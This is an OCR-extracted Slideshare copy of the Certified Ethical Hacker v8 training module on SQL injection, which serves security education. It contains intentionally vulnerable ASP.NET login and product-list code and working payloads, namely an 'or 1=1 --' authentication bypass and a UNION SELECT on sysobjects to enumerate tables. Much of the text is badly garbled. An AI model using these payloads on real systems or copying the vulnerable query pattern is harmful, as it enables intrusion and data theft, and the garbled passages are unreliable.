Ce hv8 module 14 sql injection

977
-1

Published on

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
977
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
272
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Ce hv8 module 14 sql injection

  1. 1. S Q L In je c tio n Module 14
  2. 2. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL Injection IV/lnrlnlo 1A E t h ic a l H a c k i n g a n d C o u n t e r m e a s u r e s V8 M o d u l e 1 4 : S Q L I n je c t io n E x a m 3 1 2 -5 0 Module 14 Page 1987 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  3. 3. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Security News Barclays: 97 Percent of Data Breaches Still due to S Q L Injection SQ injection attacks have been around for m than ten years, L ore an security professionals are m than capable of protecting d ore ag st them yet 9 percent of data breaches worldwide are still due ain ; 7 to an SQ injection som here along the lin according to N Jones, L ew e, eira head of paym security for Barclaycard. ent Speaking at the Infosecurity Europe Press Conference in London this w eek, Jones said that hackers are taking advantage of businesses with inadequate an often outdated inform d ation security practices. C g the m recent itin ost fig res fromthe N u ational Fraud A uthority, she said that identity fraud co sts the U m than £ .7 b n every year, and affects m than 1 m n K ore 2 illio ore .8 illio people. "Data breaches have becom a statistical certainty," saidJones. "If you look e at w the p b individ is concerned about, protecting personal hat u lic ual inform ation isactually at the sam level inthe scale of p lic social concerns e ub as preventing crim e." ‫ז‬ http://news.techworld.com Copyright © b y EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited. S e c u rity N ew s Neuis B a r c l a y s : 97 P e r c e n t o f D a t a B r e a c h e s S t i l l D u e t o S Q L In je c tio n Source: http://news.techworld.com SQL injection attacks have been around for more than ten years, and security professionals are more than capable of protecting against them; yet 97 percent of data breaches worldwide are still due to an SQL injection somewhere along the line, according to Neira Jones, head of payment security for Barclaycard. Speaking at the Infosecurity Europe Press Conference in London this week, Jones said that hackers are taking advantage of businesses with inadequate and often outdated information security practices. Citing the most recent figures from the National Fraud Authority, she said that identity fraud costs the UK more than £2.7 billion every year, and affects more than 1.8 million people. "Data breaches have become a statistical certainty," said Jones. "If you look at what the public individual is concerned about, protecting personal information is actually at the same level in the scale of public social concerns as preventing crime." Module 14 Page 1988 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  4. 4. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL injection is a code injection technique that exploits security vulnerability in a website's software. Arbitrary data is inserted into a string of code that is eventually executed by a database. The result is that the attacker can execute arbitrary SQL queries or commands on the backend database server through the web application. In October 2011, for example, attackers planted malicious JavaScript on Microsoft's ASP.Net platform. This caused the visitor's browser to load an iframe with one of two remote sites. From there, the iframe attempted to plant malware on the visitor's PC via a number of browser drive-by exploits. Microsoft has been offering ASP.Net programmers information on how to protect against SQL injection attacks since at least 2005. However, the attack still managed to affect around 180,000 pages. Jones said that, with the number of interconnected devices on the planet set to exceed the number of humans by 2015, cybercrime and data protection need to take higher priority on the board's agenda. In order for this to happen, however, the Chief Information Security Officer (CISO) needs to assess the level of risk within their organisation, and take one step at a time. "I always say, if anyone says APT [advanced persistent threat] in the room, an angel dies in heaven, because APTs are not the problem," said Jones. "I'm not saying that they're not real, but let's fix the basics first. Are organisations completely certain they're not vulnerable to SQL injections? And have they coded their web application securely?" Generally it takes between 6 and 8 months for an organisation to find out it has been breached, Jones added. However, by understanding their risk profile and taking simple proactive measures, such as threat scenario modelling, companies could prevent 87 percent of attacks. Copyright © IDG 2012 By Sophie Curtis http://news.techworld.com/securitv/3331283/barclavs-97-percent-of-data-breaches-still-due-tosal-iniection/ Module 14 Page 1989 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  5. 5. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker M odule Objectives J Network Reconnaissance Using SQL Injection J SQL Injection Tools J J Evasion Technique How to Defend Against SQL Injection Attacks J SQL Injection Detection Password Grabbing J SQL Injection Detection Tools SQL Injection Attacks J Bypass Website Logins Using SQL Injection J J SQL Injection J J SQL Injection Attack Characters J Testing for SQL Injection J Types of SQL Injection J Blind SQL Injection J CEH SQL Injection Methodology J Advanced SQL Injection Copyright © b y EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited. M o d u le O b je c tiv e s This module introduces you the concept of SQL injection and how an attacker can exploit this attack methodology on the Internet. At the end of this module, you will be familiar with: e SQL Injection © Advanced SQL Injection e SQL Injection Attacks s Bypass Website Logins Using SQL Injection e SQL Injection Detection Q Password Grabbing Q SQL Injection Attack Characters Q Network Reconnaissance Using SQL Injection 0 Testing for SQL Injection e SQL Injection Tools e Types of SQL Injection e Evasion Technique e Blind SQL Injection e How to Defend Against SQL Injection Attacks e SQL Injection Methodology Q SQL Injection Detection Tools Module 14 Page 1990 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  6. 6. Ethical Hacking and Countermeasures SQL Injection I i Exam 312-50 Certified Ethical Hacker M o d u le F lo w To understand SQL injection and its impact on the network or system, let us begin with the basic concepts of SQL injection. SQL injection is a type of code injection method that exploits the safety vulnerabilities that occur in the database layer of an application. The vulnerabilities mostly occur due to the wrongly filtered input for string literal escape characters embedded in SQL statements from the users or user input that is not strongly typed and then suddenly executed without correcting the errors. Module 14 Page 1991 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  7. 7. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker * SQL Injection Concepts Testing for SQL Injection ^ Advanced SQL Injection SQL Injection Tools Types of SQL Injection ) :^ ‫ן‬ ^ Evasion Techniques Blind SQL Injection y — Countermeasures v‫— ׳‬ SQL Injection Methodology This section introduces you to SQL injection and the threats and attacks associated with it. Module 14 Page 1992 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  8. 8. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL Injection cs Q SQL Injection is the 9 It is a fla w in W e b © Q M o st program m ers are most com m on w e b site A p p licatio n s and not a still not a w a re of this v u ln e ra b ility on the database or w eb threat Internet se rver issue © Copyright © b y EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. 1 SQ L SQL In je c tio n SQL injection is a type of web application vulnerability where an attacker can manipulate and submit a SQL command to retrieve the database information. This type of attack mostly occurs when a web application executes by using the user-provided data without validating or encoding it. It can give access to sensitive information such as social security numbers, credit card numbers, or other financial data to the attacker and allows an attacker to create, read, update, alter, or delete data stored in the backend database. It is a flaw in web applications and not a database or web server issue. Most programmers are still not aware of this threat. Module 14 Page 1993 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  9. 9. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Scenario v o la tility s u b d u e d _ — « ■rt‫. רד 3 ־‬Q u 1j . v Albert Gonzalez, an indicted hacker stole 130 million credit and debit cards, the biggest identity theft case ever prosecuted in the United States. He used SQL injection attacks to install sniffer software on the companies' servers to intercept credit card data as it was being processed. http ://www. theregister.co. uk pro**— 1 B u s i n e s s ^ w o r l d —•■nomic upturn 0 p 1 1 . m l s t i c lid a s s e t s Copyright © b y EC-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. a S c e n a rio Albert Gonzalez, an indicted hacker stole 130 million credit and debit cards, performed the biggest identity theft case ever prosecuted in the United States. He used SQL injection attacks to install sniffer software on companies' servers to intercept credit card data as it was being processed. Module 14 Page 1994 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  10. 10. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL Injection Is the M ost Prevalent Vulnerability in 2012 CEH SQL Injection Unknown DD0S D efacem ent Targeted Attack DNS Hijack Password Cracking Account Hijacking Java Vulnerability Other http://hackmageddon.com Copyright © b y EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. Source: http://hackmageddon.com According to http://hackmageddon.com. SQL injection is the most commonly used attack by the attacker to break the security of a web application. From the following statistics that were recorded in September 2012, it is clear that, SQL injection is the most serious and mostly used type of cyber-attack performed these days when compared to other attacks. Module 14 Page 1995 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  11. 11. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL Injection Unknown DDoS Defacement Targeted Attack DNS Hijack Password C racking Account Hijacking Java Vulnerability Other FIGURE 14.1: SQL Injection Module 14 Page 1996 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  12. 12. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL Injection Threats CEH U rtifM IthKJl lUckM O Spoofing Identity C hanging Price Tam w per ith D atabase Records^ '/ •. ‫- ־׳‬ M odifying Records : Escalation of Privileges Voiding Machine's ^Critical Transactions D enial‫־‬of‫־‬Service on the Server Complete Disclosure of all Data on the System . D estruction of D ata Copyright © by EG-GtUIICil. All Rights R eserved. Reproduction is Strictly Prohibited y SQL In je c tio n T h re a ts The following are the major threats of SQL injection: 9 Spoofing identity: Identity spoofing is a method followed by attackers. Here people are deceived into believing that a particular email or website has originated from the source which actually is not true. © Changing prices: One more of problem related to SQL injection is it can be used to modify data. Here the attackers enter into an online shopping portal and change the prices of product and then purchase the products at cheaper rates. Q Tamper with database records: The main data is completely damaged with data alteration; there is even the possibility of completely replacing the data or even deleting the data. Q Escalation of privileges: Once the system is hacked, the attacker seeks the high privileges used by administrative members and gains complete access to the system as well as the network. 9 Denial-of-service on the server: Denial-of-service on the server is an attack where users aren't able to access the system. More and more requests are sent to the server, which can't handle them. This results in a temporary halt in the services of the server. Module 14 Page 1997 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  13. 13. Ethical Hacking and Countermeasures SQL Injection 0 Exam 312-50 Certified Ethical Hacker Complete disclosure of all the data on the system: Once the network is hacked the crucial and highly confidential data like credit card numbers, employee details, financial records, etc. are disclosed. 0 Destruction of data: The attacker, after gaining complete control over the system, completely destroys the data, resulting in huge losses for the company. © Voiding system's critical transaction: An attacker can operate the system and can halt all the crucial transactions performed by the system. 0 Modifying the records: Attackers can modify the records of the company, which proves to be a major setback for the company's database management system. Module 14 Page 1998 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  14. 14. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker - What Is SQL Injection? CEH SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database SQL injection is a basic attack used to either gain unauthorized access to a database or to retrieve information directly from the database Copyright © b y EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited. SOL W h a t Is SQL In je c tio n ? Structured Query Language (SQL) is basically a textual language that enables interaction with a database server. SQL commands such as INSERT, RETRIEVE, UPDATE, and DELETE are used to perform operations on the database. Programmers use these commands to manipulate data in the database server. SQL injection is defined as a technique that takes advantage of non-validated input vulnerabilities and injects SQL commands through a web application that are executed in a back-end database. Programmers use sequential SQL commands with client-supplied parameters making it easier for attackers to inject commands. Attackers can easily execute random SQL queries on the database server through a web application. Attackers use this technique to either gain unauthorized access to a database or to retrieve information directly from the database. Module 14 Page 1999 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  15. 15. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker J On the basis of application used and the way it processes user supplied data, SQL injection can be used to implement the attacks mentioned below: A u th e n tic a tio n B y p a s s U gth attack, an attacker lo sonto anap lication sin is g p w ithout p vid gvalid u nam an p o ro in ser e d assw rd an g s ad inistrative p d ain m rivileg es R e m o te C o d e E x e c u t io n In fo r m a t io n D is c lo s u r e It assistsan attacker to com prom the host O ise S U gth attack, anattacker sin is o tain sen b s sitive inform ation that issto inthe d ase red atab C o m p r o m is e d C o m p r o m is e d D a ta In t e g r it y A v a ila b ilit y o f D a ta A attacker u th attackto d n ses is eface a w p e in m eb ag , sert aliciouscontent in to w p es, or alter the contents of a eb ag d ase atab A ttackers u th attacktodelete se is the d atabase in ation delete form , lo , or au it in ation that is g d form sto ina d ase red atab /Copyright © b y EG-CMMCil. All Rights JteSeivecL R ep ro d u ctio n is Strictly Prohibited. SQL In je c tio n A tta c k s Based on the application and how it processes user-supplied data, SQL injection can be used to perform the following types of attacks: a Authentication bypass: Here the attacker could enter into the network without providing any authentic user name or password and could gain the access over the network. He or she gets the highest privilege in the network. Q Information disclosure: After unauthorized entry into the network, the attacker gets access to the sensitive data stored in the database. Q Compromised data integrity: The attacker changes the main content of the website and also enters malicious content into it. Compromised availability of data: The attacker uses this type of attack to delete the data related to audit information or any other crucial database information. Remote code execution: An attacker could modify, delete, or create data or even can create new accounts with full user rights on the servers that share files and folders. It allows an attacker to compromise the host operating system. Module 14 Page 2000 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  16. 16. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker How Web Applications Work CEH h ttp://juggyboy.com /?id= 6329& print= Y Internet W e b S erver Firew all OS System Calls Operating System ID Tech W e b A pplication Topic 6329 DBM S SELECT * from news where id = 6329 CNN O utput Copyright © b y EC-ClUIICil. All Rights Reserved. Reproduction is Strictly Prohibited. H ow W eb A p p lic a tio n s W ork A web application is a software program accessed by users over a network through a web browser. W eb applications can be accessed only through a web browser (Internet Explorer, Mozilla Firefox, etc.). Users can access the application from any computer of a network. Based on web applications, web browsers also differ to some extent. Overall response time and speed is dependent on connection speed. Step 1: The user requests through the web browser from the Internet to the web server. Step 2: The W eb Server accepts the request and forwards the request sent by the user to the applicable web application server. Step 3: The web application server performs the requested task. Step 4: The web applications accesses the entire database available and responds to the web server. Step 5: The web server responds back to the user as the transaction is complete. Step 6: Finally the information that the user requested appears on the monitor of the user. Module 14 Page 2001 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  17. 17. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker ID Topic New s 6329 Tech CNN SELECT * from news where id = 6329 FIGURE 14.2: Working of Web Applications Module 14 Page 2002 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  18. 18. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Server-side Technologies CEH Powerful server-side technologies like ASP.NET and database servers allow developers to create dynam ic, data-driven websites with incredible ease The power of ASP.NETand SQL can easily be exploited by hackers using SQL injection attacks SQL Server A relational databases,SQLServer, Oracle, IBM D ll B2, and MySQL, are susceptible to SQL-injection attacks SQ injection attacks do not exploit a specific softw L are vulnerability, instead they target websites that do not follow secure coding practices for accessing and m anipulating data stored in a relational database Copyright © b y EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. S e rv e r-sid e T e c h n o lo g ie s This technology is used on the server side for client/server technology. For achieving business success, not only information is important, but we also need speed and efficiency. Server-side technology helps us to smoothly access, deliver, store, and restore information. Various server-side technologies include: ASP, ASP.Net, Cold Fusion, JSP, PHP, Python, and Ruby on Rails. Server side technologies like ASP.NET and SQL can be easily exploited by using SQL injections. Q Powerful server-side technologies like ASP.NET and database servers allow developers to create dynamic, data-driven websites with incredible ease. Q All relational databases, SQL Server, Oracle, IBM DB2, and MySQL, are susceptible to SQL injection attacks. e SQL injection attacks do not exploit a specific software vulnerability; instead they target websites that do not follow secure coding practices for accessing and manipulating data stored in a relational database. The power of ASP.NET and SQL can easily be exploited by attackers using SQL injection attacks. Module 14 Page 2003 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  19. 19. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker CEH HTTP Post R equest h ttp :// ju ggyb oy.com /lo gon .aspx ?usern am e= bart& p assw ord= sim p so n Account Login Usern am e Password J ^ b art simp! W h e n a user provides inform ation and clicks Subm it, th e brow ser subm its a string to th e w eb server th at contains the user's credentials This string is visible in th e body of the HTTP or HTTPS POST request as: SQL query at the database select * from Users where (username = 1 a r t 1 and b password = •simpson1); <form action-"/cgi-bin/login” me thod-pos t> Username: <input type-text name-username> Password: <input type=password name=password> <input type=submit value=Login> ■a••■........... .............. ................ .......................... .. Copyright © b y EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. H TTP P ost R eq u est An HTTP POST request creates a way of passing larger sets of data to the server. The HTTP POST requests are ideal for communicating with an XM L web service. These methods are designed for data submission and retrieval on a web server. W hen a user provides information and clicks Submit, the browser submits a string to the web server that contains the user's credentials. This string is visible in the body of the HTTP or HTTPS POST request as: SQL query at the database s e le c t * from U sers where (username = ,b a r t ' and password = 's im p s o n '); <form a c tio n = "/ c g i- b in / lo g in " method=post> Username: < input typ e= text name=username> Password: <input type=password name=password> C in p ut type=submit value=Login> Module 14 Page 2004 Ethical Hacking and Countermeasures Copyright © by EC-COUIICil All Rights Reserved. Reproduction is Strictly Prohibited.
  20. 20. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Example 1: Normal SQL Query I Q Q http://juggyboy.com/BadLogin.aspx B a d L o g in . a s p x . c s p r iv a t e v o id c m d L o g in S y s te m . E v e n tA r g s { 9 jy B o y .c o m s trin g s trC n x C lic k (o b je c t se n d e r, e ) = " se rve r= l o c a l h o s t ; d a t a b a s e = n o r t h w i n d /u i d = s a ; p w d = ; " ; S q lC o n n e c tio n cnx = new S q lC o n n e c t io n (s tr C n x ) c n x .O p e n ( ) ; / / T h is code is s u s c e p t ib le to SQ L in je c t io n a tta c k s . string strQry = "SELECT Count(*) FROM Users W HERE U s e r N a m e ‫ + "' ־‬t x t U ser.Text + " ‫ י‬AND Password ‫ + "י ־‬txtPasswo r d . T e x t + in t in tR e c s ; S q lC o m m a n d in t R e c s Web Browser i f ■ cm d ■ new (in t) (in t R e c s > 0 ) S q lC o m m a n d (s tr Q r y , cnx) ; cm d.E x e c u t e S c a la r ( ) ; { F o r m s A u t h e n t ic a t io n .R e d ir e c tF r o m L o g in P a g e (tx tU s e r .T e x t, f a ls e ); lb lM s g .T e x t C onstructed SQ L Q u e ry <■ } e ls e — ‫ ״‬L o g in { a tte m p t fa ile d .‫; ״‬ ) c n x .C lo s e ( ) ; > SELECT Count(*) FROM Users WHERE UserName=‫״‬Jason1 AND Password ‫י ־‬Springfield 1 Server-side Code (BadLogin.aspx) /Copyright © b y EC - C M IC il. All Rights JteServ ed lR ep ro d u ctio n Is Strictly Prohibited. E x a m p l e 1: N o r m a l S Q L Q u e r y Here the term "query" is used for the commands. All the SQL code is written in the form of a query statement and finally executed. Various data operations of the SQL queries include selection of the data, inserting/updating of the data, or creating data objects like databases and tables with SQL. All the query statements begin with a clause such as SELECT, UPDATE, CREATE, and DELETE. SQL Query Examples: Module 14 Page 2005 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  21. 21. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker ■‫ף‬ hup://]uggyboy ( 0ii1/B«kI login wvpx B J u g g y B o y .c o m b o d L o g rn . a c p x . ce p r i v a t e v o i d c m d L o g 1 n _ C 1 1 c k (o b je c t s e n d e r , S y s te n .E v e n tA r g s e) < s t r i n g s trC n x = • s e r v o r= ‫׳‬ lo c A l h o s t ; d a t a b a a o ‫ ־‬n o r t h H 1 n d ;u i d - s a ?p w d - ; " ; S q l C o n n e c t io n c n x = new S q l C o n n e c t i o n ( s t r C n x ) ; c n x . Open ( ) ; / / T h is cod e i s a tta c k s . s trin g U se rs " ‫י‬ W eb Brow ser Constructed SQL Query SELEC T C o u n t(• ) U s e r N a 1*e = ' • T a s o n ' FRO M U s e r s AN D W HERE W HERE AND s u s c a p t ib le s trQ ry = to ‫ ״‬SELEC T U se rN a m e = ' ‫״‬ P a s s w o r d * '" + SQ L i n j e c t i o n C o u n t ( * ‫)׳‬ + FRO M tx tU s e r.T e x t tx tP a s s w o rd . T e x t + + i n t m tR e c s ; S q lC o aaa an d e n d = new SqlCom m and ( s t r Q r y , c n x ) : m t R e c s = ( i n t ) crad . E x e c u t e S c a l a r () ; i f (in t R e c s > 0 ) { F o r m s A u t h e n t ic a t io n . R e d ir e c t F r o m L o g in P a g e ( t x t U s e r .T e x t, f a l s e ) ; ) e l s e { lf c lM s g . T e x t = " L o g i n a t t e m p t f a i l e d . " ; } c n x .C lo s e () ; ) P a s s w o rd ‫ ' ־‬S p r in g f ie ld * Server Side Code (BadLogin.aspx) FIGURE 14.3: SQL Query Exam ple Module 14 Page 2006 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  22. 22. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker CEH Example 1: SQL Injection Query I Q Q http://juggyboy.com/BadLogin.aspx 9 jy B o y .c o m Attacker Launching SQL Injection SELECT Count(*) FR M Users W ERE UserNam Blah' or 1 1 --1 A D Password='Springfield1 O H e=1 = N SELECT Count(*) FR M Users W ERE UserNam Blah' or 1 1 O H e=‫י‬ = —' A D Password='Springfield1 N SQL Query Executed Code after — are now com ents m Copyright © b y EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. ‫ ן‬E x a m p l e 1: S Q L I n j e c t i o n Q u e r y The most common operation in SQL is the query, and it is performed with the declarative SELECT statement. This SELECT command retrieves the data from one or more tables. SQL queries allows a user to describe or assign the desired data, and leave the DBMS (Data Base Management System) as responsible for optimizing, planning, and performing the physical operations. A SQL query includes a list of columns to be included in the final result of the SELECT keyword. If the information submitted by a browser to a web application is inserted into a database query without being properly checked, then there may be a chance of occurrence of SQL injection. HTML form that receives and passes the information posted by the user to the Active Server Pages (ASP) script running on IIS web server is the best example of SQL injection. The information passed is the user name and password. By querying a SQL server database these two data items are checked. username B la h ' o r 1=1 — password S p r in g f ie ld The query executed is: SELECT C o u n t(*) FROM U sers Password‫ ' ־‬S p r i n g f i e l d 1; Module 14 Page 2007 WHERE UserName=' B la h ' or 1=1 -- AND Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  23. 23. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker However, the ASP script builds the query from user data using the following line: B la h query = 1SELECT * FROM u sers WHERE username = 1" + B la h 1 or 1=1 — 1 +‫ ' ״‬AND password = + S p r in g f ie ld + If the user name is a single-quote character (') the effective query becomes: SELECT * FROM ' [S p r in g fie ld ]'; s e rs WHERE username = 111 AND password = This is invalid SQL syntax and produces a SQL server error message in the user's browser: M ic r o s o ft OLE DB P r o v id e r f o r ODBC D r iv e r s e r r o r '80040el4' [M icro so ft][O D B C SQL S e r v e r D r iv e r ][S Q L S e rv e r]U n c lo s e d q u o ta tio n mark b e fo re the c h a r a c te r s t r in g ‫ ' י‬and p assw ord = ''. / lo g in .a s p , l i n e 16 The quotation mark provided by the user has closed the first one, and the second generates an error, because it is unclosed. At this instance, to customize the behavior of a query, an attacker can begin injecting strings into it. The content proceeding the double hyphes (--) signify a Transact-SQL comment. 0®£ 13© nttp://|usfivt>0Y com/Badiofiin.aspx ^ B o y .c o m p a ■ 1=1•- ! Blah‫ ־‬or [ SELECT Count(*) Springfield < .................................. A ttacker Launching SQ L Injectio n FROM Users WHERE UserName” ‫י‬B l a h ' or 1"1 --' AND Password‫' ״‬Springfield' SQ L Q u e ry Executed Code after — are com ments FIGURE 14.4: SQL Injection Query Exam ple Module 14 Page 2008 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  24. 24. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker CEH Exam ple 1: Code Analysis When the attacker enters blah' or 1 1 - then the SQL query w = ill look like: SELECT Count(*) FRO M Users W HERE UserName='blah ‫ י‬Or 1 1 — = ‫ י‬A D Password='' N Because a pair of hyphens designate the beginning of a com ent in SQ the query sim m L, ply becom es: SELECT Count(*) FRO M Users W HERE UserName='blah' Or 1 1 = A user enters a user name and password that matches a record in the user's table J A dynamically generated SQL query is used to retrieve the number of matching rows J The user is then authenticated and redirected to the requested page string strQry = "SELECT Count(*) FROM Users WHERE U s e r N a m e ‫+ "' ־‬ txtUser.Text + AND Password‫" ־‬ + t x t P a s s w o r d .Text + . ; . Copyright © b y EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited. E x a m p l e 1: C o d e A n a l y s i s Code analysis is the process of automated testing of the source code for the purpose of debugging before the final release of the software for the purpose of sale or distribution. a A user enters a user name and password that matches a record in the Users table © A dynamically generated SQL query is used to retrieve the number of matching rows © The user is then authenticated and redirected to the requested page W hen the attacker enters blah' or 1=1 - then the SQL query can look like: SELECT Count Password‫' ' ־‬ (*) FROM U sers WHERE UserName=' b l a h ' Or 1=1 — ' AND Because a pair of hyphens designates the beginning of a comment in SQL, the query simply becomes: SELECT Count (*) FROM U sers WHERE UserName=' b la h ' Or 1=1 s t r in g s trQ ry = "SELECT C o u n t(*) FROM U sers WHERE tx tU s e r .T e x t + 1 ' AND Passw ord= '" + tx tP a s s w o rd . Text + 1 Module 14 Page 2009 UserName='" + Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  25. 25. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Example 2: BadProductList.aspx CEH This page displays products GO p r iv a te from the Northwind database and allows users http://juggyboy.com/BadProductList.aspx to filter the resulting list of v o id c m d F ilt e r _ C lic }c (o b je c t d g r P r o d u c t s . C u r re n tP a g e ln d e x b in d D a ta G r id ( ) ; } sen d e r. S y s te m .E v e n tA r g s e) products using a textbox called txtFilter { = 0; p r i v a t e v o id b in d D a t a G r id () { d g rP ro d u c ts .D a ta S o u rc e = c r e a t e D a t a V ie w (); d g r P r o d u c ts .D a ta B in d ( ) ; p r iv a te D a t a V ie w ) c re a te D a ta V ie w () Lik the previous e exam (BadLogin.aspx), ple this code isvulnerable to SQ injection attacks L { s t r in g s trC n x = " s e r v e r ‫ ־‬l o c a l h o s t ; u id = s a ;p w d = ; d a ta b a s e ‫ ־‬n o r t h w in d ; " ; s trin g s trS Q L - "S E L E C T "Q u a n tity P e r U n it , / / T h is i f code is P r o d u c t ld , U n it P r ic e s u s c e p t ib le to ( t x t F i l t e r .T e x t . L e n g th 8 trS Q L S q lC o n n e c t io n +‫״‬ ‫״‬ cnx W H ERE P ro d u c tN a m e , " SQ L i n j e c t i o n > 0) a tta c k s . { P ro d u c tN a m e L IK E ‫״י‬ + t x t F i l t e r .T e x t • < ‫;״‬ « new S q l C o n n e c t i o n ( s t r C n x ) ; ‫־־‬ S q l D a t a A d a p t e r s d a = new S q l D a t a A d a p t e r ( s t r S Q L , D a t a T a b le d t P r o d u c t s = new D a t a T a b l e ( ) ; sd a.F ill(d t P r o d u c t s ); re tu rn ♦ FROM P r o d u c t s " ; The executed SQ is L constructed dynam ically froma u ser-su p p lied in u pt c n x ); Attack Occurs Here d tP r o d u c ts .D e fa u ltV ie w ; Copyright © b y EG-Giancil. All Rights Reserved. Reproduction is Strictly Prohibited. E x a m p l e 2: B a d P r o d u c t L i s t . a s p x Source: http://msdn.microsoft.com This page displays products from the Northwind database and allows users to filter the resulting list of products using a textbox called txtFilter. Like the last example, the page is ripe for SQL injection attacks because the executed SQL is constructed dynamically from a userentered value. This particular page is a hacker's paradise because it can be hijacked by the astute hacker to reveal secret information, change data in the database, damage the database records, and even create new database user accounts. Most SQL-compliant databases including SQL Server, store metadata in a series of system tables with the names sysobjects, syscolumns, sysindexes, and so. This means that a hacker could use the system tables to ascertain schema information for a database to assist in the further compromise of the database. For example, the following text entered into the txtFilter textbox might be used to reveal the names of the user tables in the database: UNION SELECT id , name, 0 FROM s y s o b je c ts WHERE xtype = 'U ' -- The UNION statement in particular is useful to a hacker because it allows him or her to splice the results of one query onto another. In this case, the hacker has spliced the names of the user tables in the database to the original query of the Products table. The only trick is to match the number and data types of the columns to the original query. The previous query might reveal Module 14 Page 2010 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
